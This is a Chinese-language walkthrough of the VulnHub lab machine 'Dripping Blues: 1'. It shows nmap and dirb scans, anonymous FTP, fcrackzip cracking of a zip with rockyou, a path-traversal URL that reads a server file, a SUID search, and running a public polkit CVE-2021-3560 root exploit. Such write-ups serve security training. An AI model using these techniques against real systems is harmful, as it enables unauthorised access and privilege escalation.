vulnhub刷題記錄（Dripping Blues: 1）

• 英文名稱：Dripping Blues: 1
• 中文名稱：滴水藍調：1
• 釋出日期：2021 年 9 月 19 日
• 難度：容易
• 描述：關于 vm：測試并從 virtualbox 導出。啟用 dhcp 和嵌套 vtx/amdv。您可以通過電子郵件與我聯系以擷取故障排除或問題。
• 下載下傳位址：https://www.vulnhub.com/entry/dripping-blues-1,744/

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、主機發現，IP位址為192.168.199.242

nmap -sP 192.168.199.0/24   
Nmap scan report for drippingblues.lan (192.168.199.242)           

主機發現

2、端口掃描，發現了21、22、80端口

nmap -A 192.168.199.242           

端口掃描

3、web通路

web首頁

4、目錄爆破，發現線索

└─$ dirb http://192.168.199.242/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Aug 21 14:51:29 2022
URL_BASE: http://192.168.199.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.199.242/ ----
+ http://192.168.199.242/index.php (CODE:200|SIZE:138)                                                                                
+ http://192.168.199.242/robots.txt (CODE:200|SIZE:78)                                                                                
+ http://192.168.199.242/server-status (CODE:403|SIZE:280)                                                                            
                                                                                                                                      
-----------------
END_TIME: Sun Aug 21 14:51:34 2022
DOWNLOADED: 4612 - FOUND: 3           

目錄爆破

5、線索提示，去計算ssh的密碼

ssh線索提示

6、挖掘21端口資訊，可以匿名登入，發現respectmydrip.zip檔案 ，下載下傳之後，發現需要密碼才能打開

ftp匿名登入

7、嘗試對檔案進行密碼破解，這裡使用134M的密碼本

rockyou.txt密碼本

8、啟動暴力破解

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

PASSWORD FOUND!!!!: pw == 072528035           

暴力破解密碼

9、使用密碼，解開壓縮封包件，得到一個提示和另一個加密壓縮

just focus on "drip"              

得到提示和另一個加密壓縮包

10、嘗試web通路，得到密碼imdrippinbiatch

http://192.168.199.242/index.php?drip=../../../../etc/dripispowerful.html           

得到線索

11、根據登入頁面提示，使用者名是thugger

得到使用者名

12、ssh登入，拿到普通使用者的flag

ssh登入成功

普通使用者flag

13、尋找提權點，可疑點/usr/lib/policykit-1/polkit-agent-helper-1

thugger@drippingblues:~$ find / -perm -u=s 2>&1 | grep -v "Permission denied"
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign           

存在polkit程序

14、利用polkid提權漏洞[1]

CVE-2021-3560 是對 polkit 的一種身份驗證繞過，它允許非特權使用者使用 DBus 調用特權方法，在這個漏洞中我們将調用 accountservice 提供的 2 個特權方法（CreateUser 和 SetPassword），這允許我們建立一個特權使用者然後為其設定密碼，最後以建立的使用者身份登入，然後提升為root。

15、scp上傳poc腳本

上傳poc腳本

16、運作腳本，成功拿到root權限，獲得flag

thugger@drippingblues:~$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original exploit author: Kevin Backhouse 
For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
**************
[+] Starting the Exploit 
id: ‘ahmed’: no such user
id: ‘ahmed’: no such user
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
........           

獲得root權限

到此，實驗完成～

參考

1. ^Polkit-exploit https://github.com/Almorabea/Polkit-exploit

釋出于 2022-08-21 16:29